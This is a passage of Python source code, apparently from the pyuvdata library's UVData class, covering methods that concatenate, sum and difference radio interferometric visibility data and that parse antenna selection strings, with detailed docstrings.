zero_pad = np.zeros(
(
this.data_array.shape[0],
this.data_array.shape[1],
len(pnew_inds),
)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=2
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=2
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=2
).astype(np.bool_)
else:
zero_pad = np.zeros(
(
this.data_array.shape[0],
1,
this.data_array.shape[2],
len(pnew_inds),
)
)
this.data_array = np.concatenate(
[this.data_array, zero_pad], axis=3
)
this.nsample_array = np.concatenate(
[this.nsample_array, zero_pad], axis=3
)
this.flag_array = np.concatenate(
[this.flag_array, 1 - zero_pad], axis=3
).astype(np.bool_)
# Now populate the data
pol_t2o = np.nonzero(
np.in1d(this.polarization_array, other.polarization_array)
)[0]
if this.future_array_shapes:
freq_t2o = np.nonzero(np.in1d(this.freq_array, other.freq_array))[0]
else:
freq_t2o = np.nonzero(
np.in1d(this.freq_array[0, :], other.freq_array[0, :])
)[0]
blt_t2o = np.nonzero(np.in1d(this_blts, other_blts))[0]
if not self.metadata_only:
if this.future_array_shapes:
this.data_array[np.ix_(blt_t2o, freq_t2o, pol_t2o)] = other.data_array
this.nsample_array[
np.ix_(blt_t2o, freq_t2o, pol_t2o)
] = other.nsample_array
this.flag_array[np.ix_(blt_t2o, freq_t2o, pol_t2o)] = other.flag_array
else:
this.data_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.data_array
this.nsample_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.nsample_array
this.flag_array[
np.ix_(blt_t2o, [0], freq_t2o, pol_t2o)
] = other.flag_array
if not self.metadata_only:
if this.future_array_shapes:
if len(bnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[blt_order, :, :])
if len(fnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, f_order, :])
if len(pnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, p_order])
else:
if len(bnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[blt_order, :, :, :])
if len(fnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, f_order, :])
if len(pnew_inds) > 0:
for name, param in zip(
this._data_params, this.data_like_parameters
):
setattr(this, name, param[:, :, :, p_order])
if len(fnew_inds) > 0:
if this.future_array_shapes:
this.freq_array = this.freq_array[f_order]
else:
this.freq_array = this.freq_array[:, f_order]
if this.flex_spw or this.future_array_shapes:
this.channel_width = this.channel_width[f_order]
if this.flex_spw:
this.flex_spw_id_array = this.flex_spw_id_array[f_order]
if len(pnew_inds) > 0:
this.polarization_array = this.polarization_array[p_order]
# Update N parameters (e.g. Npols)
this.Ntimes = len(np.unique(this.time_array))
this.Nbls = len(np.unique(this.baseline_array))
this.Nblts = this.uvw_array.shape[0]
this.Nfreqs = this.freq_array.size
this.Npols = this.polarization_array.shape[0]
this.Nants_data = this._calc_nants_data()
# Update filename parameter
this.filename = uvutils._combine_filenames(this.filename, other.filename)
if this.filename is not None:
this._filename.form = (len(this.filename),)
# Check specific requirements
if this.Nfreqs > 1:
spacing_error, chanwidth_error = this._check_freq_spacing(
raise_errors=False
)
if spacing_error:
warnings.warn(
"Combined frequencies are not evenly spaced or have differing "
"values of channel widths. This will make it impossible to write "
"this data out to some file types."
)
elif chanwidth_error:
warnings.warn(
"Combined frequencies are separated by more than their "
"channel width. This will make it impossible to write this data "
"out to some file types."
)
if n_axes > 0:
history_update_string += " axis using pyuvdata."
histories_match = uvutils._check_histories(this.history, other.history)
this.history += history_update_string
if not histories_match:
if verbose_history:
this.history += " Next object history follows. " + other.history
else:
extra_history = uvutils._combine_history_addition(
this.history, other.history
)
if extra_history is not None:
this.history += (
" Unique part of next object history follows. "
+ extra_history
)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def __iadd__(
self,
other,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
make_multi_phase=False,
ignore_name=False,
):
"""
In place add.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
make_multi_phase : bool
Option to make the output a multi phase center dataset, capable of holding
data on multiple phase centers. Setting this to true will allow for two
UVData objects to be combined, even if the phase center properties do not
agree (so long as the names are unique for each phase center). Default is
False.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, self and other are not compatible
or if data in self and other overlap. One way they can not be
compatible is if they have different phasing, in that case set
`unphase_to_drift` or `phase_center_radec` to (un)phase them so they
are compatible.
If `phase_center_radec` is not None and is not length 2.
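Examples
--------
A minimal usage sketch (assumes `uvd1` and `uvd2` are compatible UVData
objects already in memory; the variable names are illustrative)::

    # in-place combine (the += operator calls this method)
    uvd1 += uvd2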
"""
self.__add__(
other,
inplace=True,
phase_center_radec=phase_center_radec,
unphase_to_drift=unphase_to_drift,
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
run_check=run_check,
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
make_multi_phase=make_multi_phase,
ignore_name=ignore_name,
)
return self
def fast_concat(
self,
other,
axis,
inplace=False,
phase_center_radec=None,
unphase_to_drift=False,
phase_frame="icrs",
orig_phase_frame=None,
use_ant_pos=True,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
ignore_name=False,
):
"""
Concatenate two UVData objects along specified axis with almost no checking.
Warning! This method assumes all the metadata along other axes is sorted
the same way. The __add__ method is much safer; it checks all the metadata,
but it is slower. Some quick checks are run, but this method doesn't
make any guarantees that the resulting object is correct.
Parameters
----------
other : UVData object or list of UVData objects
UVData object or list of UVData objects which will be added to self.
axis : str
Axis to concatenate files along. This enables fast concatenation
along the specified axis without the normal checking that all other
metadata agrees. Allowed values are: 'blt', 'freq', 'polarization'.
inplace : bool
If True, overwrite self as we go, otherwise create a third object
as the sum of the two.
phase_center_radec : array_like of float
The phase center to phase the files to before adding the objects in
radians (in the ICRS frame). Note that if this keyword is not set
and the two UVData objects are phased to different phase centers
or if one is phased and one is drift, this method will error
because the objects are not compatible.
unphase_to_drift : bool
If True, unphase the objects to drift before combining them.
phase_frame : str
The astropy frame to phase to. Either 'icrs' or 'gcrs'.
'gcrs' accounts for precession & nutation,
'icrs' accounts for precession, nutation & aberration.
Only used if `phase_center_radec` is set.
orig_phase_frame : str
The original phase frame of the data (if it is already phased). Used
for unphasing, only if `unphase_to_drift` or `phase_center_radec`
are set. Defaults to using the 'phase_center_frame' attribute or
'icrs' if that attribute is None.
use_ant_pos : bool
If True, calculate the phased or unphased uvws directly from the
antenna positions rather than from the existing uvws.
Only used if `unphase_to_drift` or `phase_center_radec` are set.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
objects are different, the combined object will keep all the history of
all input objects (if many objects are combined this can lead to very long
histories). If False and if the histories for the objects are different,
the combined object will have the history of the first object and only the
parts of the other object histories that are unique (this is done word by
word and can result in hard to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
ignore_name : bool
Option to ignore the name of the phase center (`cat_name` in
`phase_center_catalog` when `multi_phase_center=True`, otherwise
`object_name`) when combining two UVData objects. Doing so effectively
adopts the name found in the first UVData object in the sum. Default is
False.
Raises
------
ValueError
If other is not a UVData object, axis is not an allowed value or if
self and other are not compatible.
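Examples
--------
A minimal usage sketch (assumes `uvd1` and `uvd2` are UVData objects whose
metadata along the non-concatenated axes already agree and are sorted the
same way; the variable names are illustrative)::

    # concatenate along the frequency axis with minimal checking
    combined = uvd1.fast_concat(uvd2, "freq", inplace=False)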
"""
if inplace:
this = self
else:
this = self.copy()
if not isinstance(other, (list, tuple, np.ndarray)):
# if this is a UVData object already, stick it in a list
other = [other]
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
for obj in other:
if not issubclass(obj.__class__, this.__class__):
if not issubclass(this.__class__, obj.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
obj.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# check that all objects have the same array shapes
for obj in other:
if this.future_array_shapes != obj.future_array_shapes:
raise ValueError(
"All objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
if phase_center_radec is not None and unphase_to_drift:
raise ValueError(
"phase_center_radec cannot be set if unphase_to_drift is True."
)
if unphase_to_drift:
if this.phase_type != "drift":
warnings.warn("Unphasing this UVData object to drift")
this.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
for obj in other:
if obj.phase_type != "drift":
warnings.warn("Unphasing other UVData object to drift")
obj.unphase_to_drift(
phase_frame=orig_phase_frame, use_ant_pos=use_ant_pos
)
if phase_center_radec is not None:
if np.array(phase_center_radec).size != 2:
raise ValueError("phase_center_radec should have length 2.")
# If this object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
if this.phase_type == "drift" or (
not np.isclose(
this.phase_center_ra,
phase_center_radec[0],
rtol=this._phase_center_ra.tols[0],
atol=this._phase_center_ra.tols[1],
)
or not np.isclose(
this.phase_center_dec,
phase_center_radec[1],
rtol=this._phase_center_dec.tols[0],
atol=this._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing this UVData object to phase_center_radec")
this.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
# If other object is not phased or is not phased close to
# phase_center_radec, (re)phase it.
# Close is defined using the phase_center_ra/dec tolerances.
for obj in other:
if obj.phase_type == "drift" or (
not np.isclose(
obj.phase_center_ra,
phase_center_radec[0],
rtol=obj._phase_center_ra.tols[0],
atol=obj._phase_center_ra.tols[1],
)
or not np.isclose(
obj.phase_center_dec,
phase_center_radec[1],
rtol=obj._phase_center_dec.tols[0],
atol=obj._phase_center_dec.tols[1],
)
):
warnings.warn("Phasing other UVData object to phase_center_radec")
obj.phase(
phase_center_radec[0],
phase_center_radec[1],
phase_frame=phase_frame,
orig_phase_frame=orig_phase_frame,
use_ant_pos=use_ant_pos,
allow_rephase=True,
)
allowed_axes = ["blt", "freq", "polarization"]
if axis not in allowed_axes:
raise ValueError(
"If axis is specifed it must be one of: " + ", ".join(allowed_axes)
)
compatibility_params = [
"_vis_units",
"_telescope_name",
"_instrument",
"_telescope_location",
"_phase_type",
"_Nants_telescope",
"_antenna_names",
"_antenna_numbers",
"_antenna_positions",
"_phase_center_ra",
"_phase_center_dec",
"_phase_center_epoch",
"_multi_phase_center",
"_phase_center_catalog",
"_Nphase",
]
if not this.future_array_shapes and not this.flex_spw:
compatibility_params.append("_channel_width")
if not (this.multi_phase_center or ignore_name):
compatibility_params += ["_object_name"]
history_update_string = " Combined data along "
if axis == "freq":
history_update_string += "frequency"
compatibility_params += [
"_polarization_array",
"_ant_1_array",
"_ant_2_array",
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_id_array",
]
elif axis == "polarization":
history_update_string += "polarization"
compatibility_params += [
"_freq_array",
"_ant_1_array",
"_ant_2_array",
"_integration_time",
"_uvw_array",
"_lst_array",
"_phase_center_id_array",
]
elif axis == "blt":
history_update_string += "baseline-time"
compatibility_params += ["_freq_array", "_polarization_array"]
history_update_string += " axis using pyuvdata."
histories_match = []
for obj in other:
histories_match.append(uvutils._check_histories(this.history, obj.history))
this.history += history_update_string
for obj_num, obj in enumerate(other):
if not histories_match[obj_num]:
if verbose_history:
this.history += " Next object history follows. " + obj.history
else:
extra_history = uvutils._combine_history_addition(
this.history, obj.history
)
if extra_history is not None:
this.history += (
" Unique part of next object history follows. "
+ extra_history
)
# Actually check compatibility parameters
for obj in other:
for a in compatibility_params:
params_match = getattr(this, a) == getattr(obj, a)
if not params_match:
msg = (
"UVParameter "
+ a[1:]
+ " does not match. Cannot combine objects."
)
raise ValueError(msg)
if axis == "freq":
this.Nfreqs = sum([this.Nfreqs] + [obj.Nfreqs for obj in other])
if this.future_array_shapes:
this.freq_array = np.concatenate(
[this.freq_array] + [obj.freq_array for obj in other]
)
else:
this.freq_array = np.concatenate(
[this.freq_array] + [obj.freq_array for obj in other], axis=1
)
if this.flex_spw or this.future_array_shapes:
this.channel_width = np.concatenate(
[this.channel_width] + [obj.channel_width for obj in other]
)
if this.flex_spw:
this.flex_spw_id_array = np.concatenate(
[this.flex_spw_id_array] + [obj.flex_spw_id_array for obj in other]
)
this.spw_array = np.concatenate(
[this.spw_array] + [obj.spw_array for obj in other]
)
# We want to preserve per-spw information based on first appearance
# in the concatenated array.
unique_index = np.sort(
np.unique(this.flex_spw_id_array, return_index=True)[1]
)
this.spw_array = this.flex_spw_id_array[unique_index]
this.Nspws = len(this.spw_array)
spacing_error, chanwidth_error = this._check_freq_spacing(
raise_errors=False
)
if spacing_error:
warnings.warn(
"Combined frequencies are not evenly spaced or have differing "
"values of channel widths. This will make it impossible to write "
"this data out to some file types."
)
elif chanwidth_error:
warnings.warn(
"Combined frequencies are separated by more than their "
"channel width. This will make it impossible to write this data "
"out to some file types."
)
if not self.metadata_only:
if this.future_array_shapes:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=1,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=1,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=1,
)
else:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=2,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=2,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=2,
)
elif axis == "polarization":
this.polarization_array = np.concatenate(
[this.polarization_array] + [obj.polarization_array for obj in other]
)
this.Npols = sum([this.Npols] + [obj.Npols for obj in other])
pol_separation = np.diff(this.polarization_array)
if np.min(pol_separation) < np.max(pol_separation):
warnings.warn(
"Combined polarizations are not evenly spaced. This will "
"make it impossible to write this data out to some file types."
)
if not self.metadata_only:
if this.future_array_shapes:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=2,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=2,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=2,
)
else:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=3,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other],
axis=3,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=3,
)
elif axis == "blt":
this.Nblts = sum([this.Nblts] + [obj.Nblts for obj in other])
this.ant_1_array = np.concatenate(
[this.ant_1_array] + [obj.ant_1_array for obj in other]
)
this.ant_2_array = np.concatenate(
[this.ant_2_array] + [obj.ant_2_array for obj in other]
)
this.Nants_data = this._calc_nants_data()
this.uvw_array = np.concatenate(
[this.uvw_array] + [obj.uvw_array for obj in other], axis=0
)
this.time_array = np.concatenate(
[this.time_array] + [obj.time_array for obj in other]
)
this.Ntimes = len(np.unique(this.time_array))
this.lst_array = np.concatenate(
[this.lst_array] + [obj.lst_array for obj in other]
)
this.baseline_array = np.concatenate(
[this.baseline_array] + [obj.baseline_array for obj in other]
)
this.Nbls = len(np.unique(this.baseline_array))
this.integration_time = np.concatenate(
[this.integration_time] + [obj.integration_time for obj in other]
)
if not self.metadata_only:
this.data_array = np.concatenate(
[this.data_array] + [obj.data_array for obj in other], axis=0,
)
this.nsample_array = np.concatenate(
[this.nsample_array] + [obj.nsample_array for obj in other], axis=0,
)
this.flag_array = np.concatenate(
[this.flag_array] + [obj.flag_array for obj in other], axis=0,
)
if this.phase_type == "phased":
this.phase_center_app_ra = np.concatenate(
[this.phase_center_app_ra]
+ [obj.phase_center_app_ra for obj in other]
)
this.phase_center_app_dec = np.concatenate(
[this.phase_center_app_dec]
+ [obj.phase_center_app_dec for obj in other]
)
this.phase_center_frame_pa = np.concatenate(
[this.phase_center_frame_pa]
+ [obj.phase_center_frame_pa for obj in other]
)
if this.multi_phase_center:
this.phase_center_id_array = np.concatenate(
[this.phase_center_id_array]
+ [obj.phase_center_id_array for obj in other]
)
# update filename attribute
for obj in other:
this.filename = uvutils._combine_filenames(this.filename, obj.filename)
if this.filename is not None:
            this._filename.form = (len(this.filename),)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def sum_vis(
self,
other,
inplace=False,
difference=False,
verbose_history=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
override_params=None,
):
"""
Sum visibilities between two UVData objects.
By default requires that all UVParameters are the same on the two objects
except for `history`, `data_array`, `object_name`, and `extra_keywords`.
The `object_name` values are concatenated if they are different. If keys
in `extra_keywords` have different values the values from the first
object are taken.
Parameters
----------
other : UVData object
Another UVData object which will be added to self.
        inplace : bool
            If True, overwrite self as we go, otherwise create a third object
            as the sum of the two.
        difference : bool
            If True, the visibilities of the two UVData objects are differenced
            rather than summed.
verbose_history : bool
Option to allow more verbose history. If True and if the histories for the
two objects are different, the combined object will keep all the history of
both input objects (this can lead to long histories). If False and if the
histories for the two objects are different, the combined object will have
the history of the first object and only the parts of the second object
history that are unique (this is done word by word and can result in hard
to interpret histories).
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
override_params : array_like of strings
List of object UVParameters to omit from compatibility check. Overridden
parameters will not be compared between the objects, and the values
for these parameters will be taken from the first object.
Returns
-------
UVData Object
If inplace parameter is False.
Raises
------
ValueError
If other is not a UVData object, or if self and other
are not compatible.
"""
if inplace:
this = self
else:
this = self.copy()
# Check that both objects are UVData and valid
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not issubclass(other.__class__, this.__class__):
if not issubclass(this.__class__, other.__class__):
raise ValueError(
"Only UVData (or subclass) objects can be "
"added to a UVData (or subclass) object"
)
other.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
# check that both objects have the same array shapes
if this.future_array_shapes != other.future_array_shapes:
raise ValueError(
"Both objects must have the same `future_array_shapes` parameter. "
"Use the `use_future_array_shapes` or `use_current_array_shapes` "
"methods to convert them."
)
compatibility_params = list(this.__iter__())
remove_params = ["_history", "_data_array", "_object_name", "_extra_keywords"]
# Add underscores to override_params to match list from __iter__()
# Add to parameters to be removed
if override_params and all(isinstance(param, str) for param in override_params):
for param in override_params:
if param[0] != "_":
param = "_" + param
if param not in compatibility_params:
msg = (
"Provided parameter " + param[1:] + " is not a recognizable "
"UVParameter."
)
raise ValueError(msg)
remove_params.append(param)
# compatibility_params should define the parameters that need to
# be the same for objects to be summed or diffed
compatibility_params = list(set(compatibility_params) - set(remove_params))
# Check each UVParameter in compatibility_params
for param in compatibility_params:
params_match = getattr(this, param) == getattr(other, param)
if not params_match:
msg = (
"UVParameter " + param[1:] + " does not match. Cannot "
"combine objects."
)
raise ValueError(msg)
# Merge extra keywords and object_name
for intersection in set(this.extra_keywords.keys()) & set(
other.extra_keywords.keys()
):
if this.extra_keywords[intersection] != other.extra_keywords[intersection]:
warnings.warn(
"Keyword " + intersection + " in _extra_keywords is different "
"in the two objects. Taking the first object's entry."
)
# Merge extra_keywords lists, taking values from the first object
this.extra_keywords = dict(
list(other.extra_keywords.items()) + list(this.extra_keywords.items())
)
# Merge object_name if different.
if this.object_name != other.object_name:
this.object_name = this.object_name + "-" + other.object_name
# Do the summing / differencing
if difference:
this.data_array = this.data_array - other.data_array
history_update_string = " Visibilities differenced using pyuvdata."
else:
this.data_array = this.data_array + other.data_array
history_update_string = " Visibilities summed using pyuvdata."
histories_match = uvutils._check_histories(this.history, other.history)
this.history += history_update_string
if not histories_match:
if verbose_history:
this.history += " Second object history follows. " + other.history
else:
extra_history = uvutils._combine_history_addition(
this.history, other.history
)
if extra_history is not None:
this.history += (
" Unique part of second object history follows. "
+ extra_history
)
# merge file names
this.filename = uvutils._combine_filenames(this.filename, other.filename)
# Check final object is self-consistent
if run_check:
this.check(
check_extra=check_extra,
run_check_acceptability=run_check_acceptability,
strict_uvw_antpos_check=strict_uvw_antpos_check,
)
if not inplace:
return this
def diff_vis(
self,
other,
inplace=False,
run_check=True,
check_extra=True,
run_check_acceptability=True,
strict_uvw_antpos_check=False,
override_params=None,
):
"""
Difference visibilities between two UVData objects.
By default requires that all UVParameters are the same on the two objects
except for `history`, `data_array`, `object_name`, and `extra_keywords`.
The `object_name` values are concatenated if they are different. If keys
in `extra_keywords` have different values the values from the first
object are taken.
Parameters
----------
        other : UVData object
            Another UVData object whose visibilities will be subtracted from
            this object's visibilities.
        inplace : bool
            If True, overwrite self as we go, otherwise create a third object
            as the difference of the two.
run_check : bool
Option to check for the existence and proper shapes of parameters
after combining objects.
check_extra : bool
Option to check optional parameters as well as required ones.
run_check_acceptability : bool
Option to check acceptable range of the values of parameters after
combining objects.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
override_params : array_like of strings
List of object UVParameters to omit from compatibility check. Overridden
parameters will not be compared between the objects, and the values
for these parameters will be taken from the first object.
Returns
-------
UVData Object
If inplace parameter is False.
Raises
------
ValueError
If other is not a UVData object, or if self and other
are not compatible.
"""
        # sum_vis with difference=True covers both the in-place and new-object
        # cases; it returns None when inplace is True, which matches this
        # method's behavior.
        return self.sum_vis(
            other,
            difference=True,
            inplace=inplace,
            run_check=run_check,
            check_extra=check_extra,
            run_check_acceptability=run_check_acceptability,
            strict_uvw_antpos_check=strict_uvw_antpos_check,
            override_params=override_params,
        )
def parse_ants(self, ant_str, print_toggle=False):
"""
Get antpair and polarization from parsing an aipy-style ant string.
Used to support the select function. Generates two lists of antenna pair
tuples and polarization indices based on parsing of the string ant_str.
If no valid polarizations (pseudo-Stokes params, or combinations of [lr]
or [xy]) or antenna numbers are found in ant_str, ant_pairs_nums and
polarizations are returned as None.
Parameters
----------
ant_str : str
String containing antenna information to parse. Can be 'all',
'auto', 'cross', or combinations of antenna numbers and polarization
indicators 'l' and 'r' or 'x' and 'y'. Minus signs can also be used
in front of an antenna number or baseline to exclude it from being
            output in ant_pairs_nums. If ant_str has a minus sign as the first
            character, 'all,' will be prepended to the string.
See the tutorial for examples of valid strings and their behavior.
print_toggle : bool
Boolean for printing parsed baselines for a visual user check.
Returns
-------
ant_pairs_nums : list of tuples of int or None
List of tuples containing the parsed pairs of antenna numbers, or
            None if ant_str is 'all' or a pseudo-Stokes polarization.
polarizations : list of int or None
List of desired polarizations or None if ant_str does not contain a
polarization specification.
"""
return uvutils.parse_ants(
uv=self,
ant_str=ant_str,
print_toggle=print_toggle,
x_orientation=self.x_orientation,
)
def _select_preprocess(
self,
antenna_nums,
antenna_names,
ant_str,
bls,
frequencies,
freq_chans,
times,
time_range,
lsts,
lst_range,
polarizations,
blt_inds,
):
"""
Build up blt_inds, freq_inds, pol_inds and history_update_string for select.
Parameters
----------
antenna_nums : array_like of int, optional
            The antenna numbers to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_names` is also provided.
antenna_names : array_like of str, optional
            The antenna names to keep in the object (antenna positions and
names for the removed antennas will be retained unless
`keep_all_metadata` is False). This cannot be provided if
`antenna_nums` is also provided.
bls : list of tuple or list of int, optional
A list of antenna number tuples (e.g. [(0, 1), (3, 2)]), a list of
baseline 3-tuples (e.g. [(0, 1, 'xx'), (2, 3, 'yy')]), or a list of
baseline numbers (e.g. [67599, 71699, 73743]) specifying baselines
to keep in the object. For length-2 tuples, the ordering of the
numbers within the tuple does not matter. For length-3 tuples, the
polarization string is in the order of the two antennas. If
length-3 tuples are provided, `polarizations` must be None.
ant_str : str, optional
A string containing information about what antenna numbers
and polarizations to keep in the object. Can be 'auto', 'cross', 'all',
or combinations of antenna numbers and polarizations (e.g. '1',
'1_2', '1x_2y'). See tutorial for more examples of valid strings and
the behavior of different forms for ant_str.
If '1x_2y,2y_3y' is passed, both polarizations 'xy' and 'yy' will
be kept for both baselines (1, 2) and (2, 3) to return a valid
pyuvdata object.
            An ant_str cannot be passed in addition to any of the `antenna_nums`,
            `antenna_names`, `bls`, or `polarizations` parameters; if it is, a
            ValueError will be raised.
frequencies : array_like of float, optional
The frequencies to keep in the object, each value passed here should
exist in the freq_array.
freq_chans : array_like of int, optional
The frequency channel numbers to keep in the object.
times : array_like of float, optional
The times to keep in the object, each value passed here should exist
in the time_array. Cannot be used with `time_range`, `lsts`, or
            `lst_range`.
time_range : array_like of float, optional
The time range in Julian Date to keep in the object, must be length
2. Some of the times in the object should fall between the first and
            last elements. Cannot be used with `times`, `lsts`, or `lst_range`.
lsts : array_like of float, optional
The local sidereal times (LSTs) to keep in the object, each value
passed here should exist in the lst_array. Cannot be used with
`times`, `time_range`, or `lst_range`.
lst_range : array_like of float, optional
The local sidereal time (LST) range in radians to keep in the
object, must be of length 2. Some of the LSTs in the object should
fall between the first and last elements. If the second value is
smaller than the first, the LSTs are treated as having phase-wrapped
around LST = 2*pi = 0, and the LSTs kept on the object will run from
the larger value, through 0, and end at the smaller value.
polarizations : array_like of int or str, optional
            The polarization numbers to keep in the object, each value passed
here should exist in the polarization_array. If passing strings, the
canonical polarization strings (e.g. "xx", "rr") are supported and if the
`x_orientation` attribute is set, the physical dipole strings
(e.g. "nn", "ee") are also supported.
blt_inds : array_like of int, optional
The baseline-time indices to keep in the object. This is
not commonly used.
Returns
-------
blt_inds : list of int
list of baseline-time indices to keep. Can be None (to keep everything).
freq_inds : list of int
list of frequency indices to keep. Can be None (to keep everything).
pol_inds : list of int
list of polarization indices to keep. Can be None (to keep everything).
history_update_string : str
string to append to the end of the history.
"""
# build up history string as we go
history_update_string = " Downselected to specific "
n_selects = 0
if ant_str is not None:
if not (
antenna_nums is None
and antenna_names is None
and bls is None
and polarizations is None
):
raise ValueError(
"Cannot provide ant_str with antenna_nums, antenna_names, "
"bls, or polarizations."
)
else:
bls, polarizations = self.parse_ants(ant_str)
if bls is not None and len(bls) == 0:
raise ValueError(
f"There is no data matching ant_str={ant_str} in this object."
)
# Antennas, times and blt_inds all need to be combined into a set of
# blts indices to keep.
# test for blt_inds presence before adding inds from antennas & times
if blt_inds is not None:
blt_inds = uvutils._get_iterable(blt_inds)
if np.array(blt_inds).ndim > 1:
blt_inds = np.array(blt_inds).flatten()
history_update_string += "baseline-times"
n_selects += 1
if antenna_names is not None:
if antenna_nums is not None:
raise ValueError(
"Only one of antenna_nums and antenna_names can be provided."
)
if not isinstance(antenna_names, (list, tuple, np.ndarray)):
antenna_names = (antenna_names,)
if np.array(antenna_names).ndim > 1:
antenna_names = np.array(antenna_names).flatten()
antenna_nums = []
for s in antenna_names:
if s not in self.antenna_names:
raise ValueError(
"Antenna name {a} is not present in the antenna_names"
" array".format(a=s)
)
antenna_nums.append(
self.antenna_numbers[np.where(np.array(self.antenna_names) == s)][0]
)
if antenna_nums is not None:
antenna_nums = uvutils._get_iterable(antenna_nums)
if np.array(antenna_nums).ndim > 1:
antenna_nums = np.array(antenna_nums).flatten()
if n_selects > 0:
history_update_string += ", antennas"
else:
